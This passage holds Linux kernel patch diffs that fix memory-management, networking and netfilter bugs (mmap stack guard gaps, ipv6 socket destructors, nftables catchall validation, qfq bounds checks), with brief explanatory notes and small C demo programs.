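	printf("fail_at=3:  %d\n", setup_all(slots, 3));	/* -1, no leaks */
	printf("fail_at=-1: %d\n", setup_all(slots, -1));	/*  0, all set up */
	for (int i = 0; i < N; i++)
		free(slots[i]);
	return 0;
}
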
+diff --git a/mm/kmsan/shadow.c b/mm/kmsan/shadow.c
+index a787c04e9583c..b8bb95eea5e3d 100644
+--- a/mm/kmsan/shadow.c
++++ b/mm/kmsan/shadow.c
+@@ -216,27 +216,29 @@ void kmsan_free_page(struct page *page, unsigned int order)
+ 	kmsan_leave_runtime();
+ }
+ 
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift)
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift)
+ {
+ 	unsigned long shadow_start, origin_start, shadow_end, origin_end;
+ 	struct page **s_pages, **o_pages;
+-	int nr, mapped;
++	int nr, mapped, err = 0;
+ 
+ 	if (!kmsan_enabled)
+-		return;
++		return 0;
+ 
+ 	shadow_start = vmalloc_meta((void *)start, KMSAN_META_SHADOW);
+ 	shadow_end = vmalloc_meta((void *)end, KMSAN_META_SHADOW);
+ 	if (!shadow_start)
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	s_pages = kcalloc(nr, sizeof(*s_pages), GFP_KERNEL);
+ 	o_pages = kcalloc(nr, sizeof(*o_pages), GFP_KERNEL);
+-	if (!s_pages || !o_pages)
++	if (!s_pages || !o_pages) {
++		err = -ENOMEM;
+ 		goto ret;
++	}
+ 	for (int i = 0; i < nr; i++) {
+ 		s_pages[i] = shadow_page_for(pages[i]);
+ 		o_pages[i] = origin_page_for(pages[i]);
+@@ -249,10 +251,16 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ 	kmsan_enter_runtime();
+ 	mapped = __vmap_pages_range_noflush(shadow_start, shadow_end, prot,
+ 					    s_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	mapped = __vmap_pages_range_noflush(origin_start, origin_end, prot,
+ 					    o_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	kmsan_leave_runtime();
+ 	flush_tlb_kernel_range(shadow_start, shadow_end);
+ 	flush_tlb_kernel_range(origin_start, origin_end);
+@@ -262,6 +270,7 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ ret:
+ 	kfree(s_pages);
+ 	kfree(o_pages);
++	return err;
+ }
+ 
+ /* Allocate metadata for pages allocated at boot time. */
+diff --git a/mm/mmap.c b/mm/mmap.c
+index fe1db604dc49e..14ca259189b77 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1565,7 +1565,8 @@ static inline int accountable_mapping(struct file *file, vm_flags_t vm_flags)
+  */
+ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, low_limit;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 
+@@ -1574,12 +1575,29 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area(&mas, info->low_limit, info->high_limit - 1,
+-				  length))
++	low_limit = info->low_limit;
++retry:
++	if (mas_empty_area(&mas, low_limit, info->high_limit - 1, length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.index;
+ 	gap += (info->align_offset - gap) & info->align_mask;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) < gap + length - 1) {
++			low_limit = tmp->vm_end;
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			low_limit = vm_end_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+@@ -1595,7 +1613,8 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+  */
+ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, high_limit, gap_end;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 	/* Adjust search length to account for worst case alignment overhead */
+@@ -1603,12 +1622,31 @@ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area_rev(&mas, info->low_limit, info->high_limit - 1,
++	high_limit = info->high_limit;
++retry:
++	if (mas_empty_area_rev(&mas, info->low_limit, high_limit - 1,
+ 				length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.last + 1 - info->length;
+ 	gap -= (gap - info->align_offset) & info->align_mask;
++	gap_end = mas.last;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) <= gap_end) {
++			high_limit = vm_start_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			high_limit = tmp->vm_start;
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
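
Both search paths keep the pre-existing alignment step. The expression
gap += (info->align_offset - gap) & info->align_mask rounds gap up to the
next address congruent to align_offset modulo the alignment, provided
align_mask is a power of two minus one. A quick check of that arithmetic
with illustrative values:

#include <stdio.h>

static unsigned long align_up_to_offset(unsigned long gap,
					unsigned long offset,
					unsigned long mask)
{
	return gap + ((offset - gap) & mask);
}

int main(void)
{
	/* 64 KiB alignment with a page-colour offset of 0x3000. */
	unsigned long mask = 0xffffUL, offset = 0x3000;
	unsigned long gap = 0x12345000, aligned;

	aligned = align_up_to_offset(gap, offset, mask);
	printf("%#lx -> %#lx (low bits %#lx)\n",
	       gap, aligned, aligned & mask);	/* low bits == 0x3000 */
	return 0;
}
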
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 5cae089639848..69668817fed37 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -6599,7 +6599,21 @@ static void __build_all_zonelists(void *data)
+ 	int nid;
+ 	int __maybe_unused cpu;
+ 	pg_data_t *self = data;
++	unsigned long flags;
+ 
++	/*
++	 * Explicitly disable this CPU's interrupts before taking seqlock
++	 * to prevent any IRQ handler from calling into the page allocator
++	 * (e.g. with GFP_ATOMIC), which could hit zonelist_iter_begin and livelock.
++	 */
++	local_irq_save(flags);
++	/*
++	 * Explicitly disable this CPU's synchronous printk() before taking
++	 * seqlock to prevent any printk() from trying to take port->lock:
++	 * tty_insert_flip_string_and_push_buffer() on another CPU might be
++	 * calling kmalloc(GFP_ATOMIC | __GFP_NOWARN) with port->lock held.
++	 */
++	printk_deferred_enter();
+ 	write_seqlock(&zonelist_update_seq);
+ 
+ #ifdef CONFIG_NUMA
+@@ -6638,6 +6652,8 @@ static void __build_all_zonelists(void *data)
+ 	}
+ 
+ 	write_sequnlock(&zonelist_update_seq);
++	printk_deferred_exit();
++	local_irq_restore(flags);
+ }
+ 
+ static noinline void __init
+@@ -9418,6 +9434,9 @@ static bool pfn_range_valid_contig(struct zone *z, unsigned long start_pfn,
+ 
+ 		if (PageReserved(page))
+ 			return false;
++
++		if (PageHuge(page))
++			return false;
+ 	}
+ 	return true;
+ }
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index d606e53c650e5..d5dc361dc104d 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -321,8 +321,8 @@ int ioremap_page_range(unsigned long addr, unsigned long end,
+ 				 ioremap_max_page_shift);
+ 	flush_cache_vmap(addr, end);
+ 	if (!err)
+-		kmsan_ioremap_page_range(addr, end, phys_addr, prot,
+-					 ioremap_max_page_shift);
++		err = kmsan_ioremap_page_range(addr, end, phys_addr, prot,
++					       ioremap_max_page_shift);
+ 	return err;
+ }
+ 
+@@ -613,7 +613,11 @@ int __vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ int vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ 		pgprot_t prot, struct page **pages, unsigned int page_shift)
+ {
+-	kmsan_vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
++	int ret = kmsan_vmap_pages_range_noflush(addr, end, prot, pages,
++						 page_shift);
++
++	if (ret)
++		return ret;
+ 	return __vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
+ }
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9554abcfd5b4e..812bd7e1750b6 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -868,12 +868,17 @@ static unsigned int ip_sabotage_in(void *priv,
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	if (nf_bridge && !nf_bridge->in_prerouting &&
+-	    !netif_is_l3_master(skb->dev) &&
+-	    !netif_is_l3_slave(skb->dev)) {
+-		nf_bridge_info_free(skb);
+-		state->okfn(state->net, state->sk, skb);
+-		return NF_STOLEN;
++	if (nf_bridge) {
++		if (nf_bridge->sabotage_in_done)
++			return NF_ACCEPT;
++
++		if (!nf_bridge->in_prerouting &&
++		    !netif_is_l3_master(skb->dev) &&
++		    !netif_is_l3_slave(skb->dev)) {
++			nf_bridge->sabotage_in_done = 1;
++			state->okfn(state->net, state->sk, skb);
++			return NF_STOLEN;
++		}
+ 	}
+ 
+ 	return NF_ACCEPT;
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 8f3d76c751dd0..4b3982c368b35 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -146,6 +146,17 @@ br_switchdev_fdb_notify(struct net_bridge *br,
+ {
+ 	struct switchdev_notifier_fdb_info item;
+ 
++	/* Entries with these flags were created using ndm_state == NUD_REACHABLE,
++	 * ndm_flags == NTF_MASTER( | NTF_STICKY), ext_flags == 0 by something
++	 * equivalent to 'bridge fdb add ... master dynamic (sticky)'.
++	 * Drivers don't know how to deal with these, so don't notify them to
++	 * avoid confusing them.
++	 */
++	if (test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags) &&
++	    !test_bit(BR_FDB_STATIC, &fdb->flags) &&
++	    !test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags))
++		return;
++
+ 	br_switchdev_fdb_populate(br, &item, fdb, NULL);
+ 
+ 	switch (type) {
+diff --git a/net/dccp/dccp.h b/net/dccp/dccp.h
+index 7dfc00c9fb32b..9ddc3a9e89e40 100644
+--- a/net/dccp/dccp.h
++++ b/net/dccp/dccp.h
+@@ -278,6 +278,7 @@ int dccp_rcv_state_process(struct sock *sk, struct sk_buff *skb,
+ int dccp_rcv_established(struct sock *sk, struct sk_buff *skb,
+ 			 const struct dccp_hdr *dh, const unsigned int len);
+ 
++void dccp_destruct_common(struct sock *sk);
+ int dccp_init_sock(struct sock *sk, const __u8 ctl_sock_initialized);
+ void dccp_destroy_sock(struct sock *sk);
+ 
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 7a736c352dc4b..b9d7c3dd1cb39 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -1004,6 +1004,12 @@ static const struct inet_connection_sock_af_ops dccp_ipv6_mapped = {
+ 	.sockaddr_len	   = sizeof(struct sockaddr_in6),
+ };
+ 
++static void dccp_v6_sk_destruct(struct sock *sk)
++{
++	dccp_destruct_common(sk);
++	inet6_sock_destruct(sk);
++}
++
+ /* NOTE: A lot of things set to zero explicitly by call to
+  *       sk_alloc() so need not be done here.
+  */
+@@ -1016,17 +1022,12 @@ static int dccp_v6_init_sock(struct sock *sk)
+ 		if (unlikely(!dccp_v6_ctl_sock_initialized))
+ 			dccp_v6_ctl_sock_initialized = 1;
+ 		inet_csk(sk)->icsk_af_ops = &dccp_ipv6_af_ops;
++		sk->sk_destruct = dccp_v6_sk_destruct;
+ 	}
+ 
+ 	return err;
+ }
+ 
+-static void dccp_v6_destroy_sock(struct sock *sk)
+-{
+-	dccp_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ static struct timewait_sock_ops dccp6_timewait_sock_ops = {
+ 	.twsk_obj_size	= sizeof(struct dccp6_timewait_sock),
+ };
+@@ -1049,7 +1050,7 @@ static struct proto dccp_v6_prot = {
+ 	.accept		   = inet_csk_accept,
+ 	.get_port	   = inet_csk_get_port,
+ 	.shutdown	   = dccp_shutdown,
+-	.destroy	   = dccp_v6_destroy_sock,
++	.destroy	   = dccp_destroy_sock,
+ 	.orphan_count	   = &dccp_orphan_count,
+ 	.max_header	   = MAX_DCCP_HEADER,
+ 	.obj_size	   = sizeof(struct dccp6_sock),
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index 85e35c5e88902..a06b5641287a2 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -171,12 +171,18 @@ const char *dccp_packet_name(const int type)
+ 
+ EXPORT_SYMBOL_GPL(dccp_packet_name);
+ 
+-static void dccp_sk_destruct(struct sock *sk)
++void dccp_destruct_common(struct sock *sk)
+ {
+ 	struct dccp_sock *dp = dccp_sk(sk);
+ 
+ 	ccid_hc_tx_delete(dp->dccps_hc_tx_ccid, sk);
+ 	dp->dccps_hc_tx_ccid = NULL;
++}
++EXPORT_SYMBOL_GPL(dccp_destruct_common);
++
++static void dccp_sk_destruct(struct sock *sk)
++{
++	dccp_destruct_common(sk);
+ 	inet_sock_destruct(sk);
+ }
+ 
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index fb1bf6eb0ff8e..b5309ae87fd79 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -114,6 +114,7 @@ void inet6_sock_destruct(struct sock *sk)
+ 	inet6_cleanup_sock(sk);
+ 	inet_sock_destruct(sk);
+ }
++EXPORT_SYMBOL_GPL(inet6_sock_destruct);
+ 
+ static int inet6_create(struct net *net, struct socket *sock, int protocol,
+ 			int kern)
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 86c26e48d065a..808983bc2ec9f 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -23,11 +23,6 @@
+ #include <linux/bpf-cgroup.h>
+ #include <net/ping.h>
+ 
+-static void ping_v6_destroy(struct sock *sk)
+-{
+-	inet6_destroy_sock(sk);
+-}
+-
+ /* Compatibility glue so we can support IPv6 when it's compiled as a module */
+ static int dummy_ipv6_recv_error(struct sock *sk, struct msghdr *msg, int len,
+ 				 int *addr_len)
+@@ -205,7 +200,6 @@ struct proto pingv6_prot = {
+ 	.owner =	THIS_MODULE,
+ 	.init =		ping_init_sock,
+ 	.close =	ping_close,
+-	.destroy =	ping_v6_destroy,
+ 	.pre_connect =	ping_v6_pre_connect,
+ 	.connect =	ip6_datagram_connect_v6_only,
+ 	.disconnect =	__udp_disconnect,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 9ee1506e23ab1..4fc511bdf176c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -1175,8 +1175,6 @@ static void raw6_destroy(struct sock *sk)
+ 	lock_sock(sk);
+ 	ip6_flush_pending_frames(sk);
+ 	release_sock(sk);
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ static int rawv6_init_sk(struct sock *sk)
+diff --git a/net/ipv6/rpl.c b/net/ipv6/rpl.c
+index 488aec9e1a74f..d1876f1922255 100644
+--- a/net/ipv6/rpl.c
++++ b/net/ipv6/rpl.c
+@@ -32,7 +32,8 @@ static void *ipv6_rpl_segdata_pos(const struct ipv6_rpl_sr_hdr *hdr, int i)
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre)
+ {
+-	return (n * IPV6_PFXTAIL_LEN(cmpri)) + IPV6_PFXTAIL_LEN(cmpre);
++	return sizeof(struct ipv6_rpl_sr_hdr) + (n * IPV6_PFXTAIL_LEN(cmpri)) +
++		IPV6_PFXTAIL_LEN(cmpre);
+ }
+ 
+ void ipv6_rpl_srh_decompress(struct ipv6_rpl_sr_hdr *outhdr,
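
The rpl.c fix adds the header size the old formula forgot. In an RPL source
route header, each of the n intermediate addresses is stored with cmpri
prefix octets elided and the final one with cmpre elided. Assuming
IPV6_PFXTAIL_LEN(x) is 16 - x (the bytes actually kept of a 16-byte IPv6
address) and an illustrative 8-byte header, the total works out as below:

#include <stdio.h>

#define IPV6_ADDR_LEN	16
#define SRH_HDR_LEN	8	/* stand-in for sizeof(struct ipv6_rpl_sr_hdr) */
#define PFXTAIL(c)	(IPV6_ADDR_LEN - (c))

static unsigned int rpl_srh_size(unsigned int n, unsigned int cmpri,
				 unsigned int cmpre)
{
	return SRH_HDR_LEN + n * PFXTAIL(cmpri) + PFXTAIL(cmpre);
}

int main(void)
{
	/* 3 hops sharing a 12-byte prefix; the last hop shares 8 bytes. */
	printf("%u bytes\n", rpl_srh_size(3, 12, 8));
	/* 8 + 3*4 + 8 = 28; the old formula would have claimed 20. */
	return 0;
}
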
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index ea1ecf5fe947c..81afb40bfc0bb 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1951,12 +1951,6 @@ static int tcp_v6_init_sock(struct sock *sk)
+ 	return 0;
+ }
+ 
+-static void tcp_v6_destroy_sock(struct sock *sk)
+-{
+-	tcp_v4_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ #ifdef CONFIG_PROC_FS
+ /* Proc filesystem TCPv6 sock list dumping. */
+ static void get_openreq6(struct seq_file *seq,
+@@ -2149,7 +2143,7 @@ struct proto tcpv6_prot = {
+ 	.accept			= inet_csk_accept,
+ 	.ioctl			= tcp_ioctl,
+ 	.init			= tcp_v6_init_sock,
+-	.destroy		= tcp_v6_destroy_sock,
++	.destroy		= tcp_v4_destroy_sock,
+ 	.shutdown		= tcp_shutdown,
+ 	.setsockopt		= tcp_setsockopt,
+ 	.getsockopt		= tcp_getsockopt,
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 17d721a6add72..0b8127988adb7 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1668,8 +1668,6 @@ void udpv6_destroy_sock(struct sock *sk)
+ 			udp_encap_disable();
+ 		}
+ 	}
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ /*
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 9db7f4f5a4414..5137ea1861ce2 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -257,8 +257,6 @@ static void l2tp_ip6_destroy_sock(struct sock *sk)
+ 
+ 	if (tunnel)
+ 		l2tp_tunnel_delete(tunnel);
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 19f35869a164a..b1bbb0b75a13c 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3939,12 +3939,6 @@ static const struct proto_ops mptcp_v6_stream_ops = {
+ 
+ static struct proto mptcp_v6_prot;
+ 
+-static void mptcp_v6_destroy(struct sock *sk)
+-{
+-	mptcp_destroy(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ static struct inet_protosw mptcp_v6_protosw = {
+ 	.type		= SOCK_STREAM,
+ 	.protocol	= IPPROTO_MPTCP,
+@@ -3960,7 +3954,6 @@ int __init mptcp_proto_v6_init(void)
+ 	mptcp_v6_prot = mptcp_prot;
+ 	strcpy(mptcp_v6_prot.name, "MPTCPv6");
+ 	mptcp_v6_prot.slab = NULL;
+-	mptcp_v6_prot.destroy = mptcp_v6_destroy;
+ 	mptcp_v6_prot.obj_size = sizeof(struct mptcp6_sock);
+ 
+ 	err = proto_register(&mptcp_v6_prot, 1);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1a9d759d0a026..12d815b9aa131 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3391,6 +3391,64 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 	return 0;
+ }
+ 
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem)
++{
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
++	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
++	const struct nft_data *data;
++	int err;
++
++	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
++	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
++		return 0;
++
++	data = nft_set_ext_data(ext);
++	switch (data->verdict.code) {
++	case NFT_JUMP:
++	case NFT_GOTO:
++		pctx->level++;
++		err = nft_chain_validate(ctx, data->verdict.chain);
++		if (err < 0)
++			return err;
++		pctx->level--;
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++	int ret = 0;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		ret = nft_setelem_validate(ctx, set, NULL, &elem);
++		if (ret < 0)
++			return ret;
++	}
++
++	return ret;
++}
++
+ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 					     const struct nft_chain *chain,
+ 					     const struct nlattr *nla);
+@@ -4695,12 +4753,6 @@ err_set_name:
+ 	return err;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 				     struct nft_set *set)
+ {
+@@ -5988,7 +6040,8 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (!nla[NFTA_SET_ELEM_KEY] && !(flags & NFT_SET_ELEM_CATCHALL))
++	if (((flags & NFT_SET_ELEM_CATCHALL) && nla[NFTA_SET_ELEM_KEY]) ||
++	    (!(flags & NFT_SET_ELEM_CATCHALL) && !nla[NFTA_SET_ELEM_KEY]))
+ 		return -EINVAL;
+ 
+ 	if (flags != 0) {
+@@ -6980,7 +7033,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (nla[NFTA_OBJ_USERDATA]) {
+-		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL);
++		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL_ACCOUNT);
+ 		if (obj->udata == NULL)
+ 			goto err_userdata;
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index dfae12759c7cd..d9ad1aa818564 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -198,37 +198,6 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static int nft_lookup_validate_setelem(const struct nft_ctx *ctx,
+-				       struct nft_set *set,
+-				       const struct nft_set_iter *iter,
+-				       struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
+-	const struct nft_data *data;
+-	int err;
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		pctx->level++;
+-		err = nft_chain_validate(ctx, data->verdict.chain);
+-		if (err < 0)
+-			return err;
+-		pctx->level--;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **d)
+@@ -244,9 +213,12 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+-	iter.fn		= nft_lookup_validate_setelem;
++	iter.fn		= nft_setelem_validate;
+ 
+ 	priv->set->ops->walk(ctx, priv->set, &iter);
++	if (!iter.err)
++		iter.err = nft_set_catchall_validate(ctx, priv->set);
++
+ 	if (iter.err < 0)
+ 		return iter.err;
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index cf5ebe43b3b4e..02098a02943eb 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -421,15 +421,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	} else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX]) {
++	if (tb[TCA_QFQ_LMAX])
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-		if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-			pr_notice("qfq: invalid max length %u\n", lmax);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		lmax = psched_mtu(qdisc_dev(sch));
+ 
++	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
++		pr_notice("qfq: invalid max length %u\n", lmax);
++		return -EINVAL;
++	}
++
+ 	inv_w = ONE_FP / weight;
+ 	weight = ONE_FP / inv_w;
+ 
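
Moving the qfq bounds check below both branches means the device-derived
default (psched_mtu()) is now validated too, not just a user-supplied
TCA_QFQ_LMAX. A tiny model of the corrected control flow (constants are
illustrative):

#include <stdio.h>

#define MIN_LMAX	512
#define MAX_LMAX	(1L << 19)

/* Pick lmax from either source, then validate once. */
static long pick_lmax(long user_lmax, long dev_mtu)
{
	long lmax = user_lmax > 0 ? user_lmax : dev_mtu;

	if (lmax < MIN_LMAX || lmax > MAX_LMAX)
		return -1;	/* previously unreachable for the MTU path */
	return lmax;
}

int main(void)
{
	printf("%ld\n", pick_lmax(2048, 1500));	/* 2048: user value accepted */
	printf("%ld\n", pick_lmax(-1, 100));	/* -1: bogus device MTU caught */
	return 0;
}
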
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 507b2ad5ef7c7..17185200079d5 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -5102,13 +5102,17 @@ static void sctp_destroy_sock(struct sock *sk)
+ }
+ 
+ /* Triggered when there are no references on the socket anymore */
+-static void sctp_destruct_sock(struct sock *sk)
++static void sctp_destruct_common(struct sock *sk)
+ {
+ 	struct sctp_sock *sp = sctp_sk(sk);
+ 
+ 	/* Free up the HMAC transform. */
+ 	crypto_free_shash(sp->hmac);
++}
+ 
++static void sctp_destruct_sock(struct sock *sk)
++{
++	sctp_destruct_common(sk);
+ 	inet_sock_destruct(sk);
+ }
+ 
+@@ -9431,7 +9435,7 @@ void sctp_copy_sock(struct sock *newsk, struct sock *sk,
+ 	sctp_sk(newsk)->reuse = sp->reuse;
+ 
+ 	newsk->sk_shutdown = sk->sk_shutdown;
+-	newsk->sk_destruct = sctp_destruct_sock;
++	newsk->sk_destruct = sk->sk_destruct;
+ 	newsk->sk_family = sk->sk_family;
+ 	newsk->sk_protocol = IPPROTO_SCTP;
+ 	newsk->sk_backlog_rcv = sk->sk_prot->backlog_rcv;
+@@ -9666,11 +9670,20 @@ struct proto sctp_prot = {
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 
+-#include <net/transp_v6.h>
+-static void sctp_v6_destroy_sock(struct sock *sk)
++static void sctp_v6_destruct_sock(struct sock *sk)
++{
++	sctp_destruct_common(sk);
++	inet6_sock_destruct(sk);
++}
++
++static int sctp_v6_init_sock(struct sock *sk)
+ {
+-	sctp_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
++	int ret = sctp_init_sock(sk);
++
++	if (!ret)
++		sk->sk_destruct = sctp_v6_destruct_sock;
++
++	return ret;
+ }
+ 
+ struct proto sctpv6_prot = {
+@@ -9680,8 +9693,8 @@ struct proto sctpv6_prot = {
+ 	.disconnect	= sctp_disconnect,
+ 	.accept		= sctp_accept,
+ 	.ioctl		= sctp_ioctl,
+-	.init		= sctp_init_sock,
+-	.destroy	= sctp_v6_destroy_sock,
++	.init		= sctp_v6_init_sock,
++	.destroy	= sctp_destroy_sock,
+ 	.shutdown	= sctp_shutdown,
+ 	.setsockopt	= sctp_setsockopt,
